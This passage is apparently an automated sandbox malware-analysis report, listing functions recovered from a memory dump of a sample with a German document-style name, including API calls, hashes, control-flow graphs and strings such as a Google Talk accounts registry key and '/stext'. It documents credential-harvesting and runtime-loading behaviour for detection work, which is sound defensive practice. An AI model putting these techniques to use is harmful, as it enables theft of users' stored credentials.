                                                            • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                            • DeleteObject.GDI32(?), ref: 0040CD5A
                                                            • memset.MSVCRT ref: 0040CD96
                                                            • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                            • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                            • String ID:
                                                            • API String ID: 2054149589-0
                                                            • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                            • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                            Function 0044B40E Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 434 44b40e-44b415 GetModuleHandleA 435 44b455 434->435 436 44b417-44b426 call 44b42b 434->436 438 44b457-44b45b 435->438 445 44b48d 436->445 446 44b428-44b433 GetProcAddress 436->446 440 44b45d-44b465 GetModuleHandleA 438->440 441 44b49a call 44b49f 438->441 444 44b467-44b46f 440->444 444->444 447 44b471-44b474 444->447 449 44b48e-44b496 445->449 446->435 450 44b435-44b442 VirtualProtect 446->450 447->438 448 44b476-44b478 447->448 451 44b47e-44b486 448->451 452 44b47a-44b47c 448->452 458 44b498 449->458 454 44b454 450->454 455 44b444-44b452 VirtualProtect 450->455 456 44b487-44b488 GetProcAddress 451->456 452->456 454->435 455->454 456->445 458->447
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                              • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                              • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                              • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                            Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                            • memset.MSVCRT ref: 00408620
                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                            • memset.MSVCRT ref: 00408671
                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                            • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                            Strings
                                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                            • String ID: Software\Google\Google Talk\Accounts
                                                            • API String ID: 1366857005-1079885057
                                                            • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                            • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                            Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Cursor_mbsicmpqsort
                                                            • String ID: /nosort$/sort
                                                            • API String ID: 882979914-1578091866
                                                            • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                            • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                            Function 0044B3CF Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                              • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                              • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                              • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                              • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                            • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                            • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                            Function 0044B42B Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                            • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                            • String ID:
                                                            • API String ID: 2152742572-0
                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                            Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75D50A60,?,00000000), ref: 00410D1C
                                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                            • memset.MSVCRT ref: 00410E10
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                            • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                            • API String ID: 889583718-2036018995
                                                            • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                            • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                            Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                            • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                            • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                            • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                            • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                            • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                            Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004109F7
                                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                              • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                            • memset.MSVCRT ref: 00410A32
                                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                            • String ID:
                                                            • API String ID: 3143880245-0
                                                            • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                            • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                            Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                            • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                            Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D5C
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D7A
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D98
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408DA8
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID:
                                                            • API String ID: 1033339047-0
                                                            • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                            • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                            • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                            • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                            Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • malloc.MSVCRT ref: 00406F4C
                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,75D50A60,00407A43,00000001,?,00000000,75D50A60,00407DBD,00000000,?,?), ref: 00406F64
                                                            • free.MSVCRT ref: 00406F6D
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: freemallocmemcpy
                                                            • String ID:
                                                            • API String ID: 3056473165-0
                                                            • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                            • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                            • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                            • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                            Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                            • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateFontIndirect_mbscpymemset
                                                            • String ID: Arial
                                                            • API String ID: 3853255127-493054409
                                                            • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                            • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                            • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                            • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                            Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen$_strcmpimemset
                                                            • String ID: /stext
                                                            • API String ID: 520177685-3817206916
                                                            • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                            • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                            Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID:
                                                            • API String ID: 145871493-0
                                                            • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                            • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                            Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                            • String ID:
                                                            • API String ID: 4165544737-0
                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                            Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                            Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                            Memory Dump Source
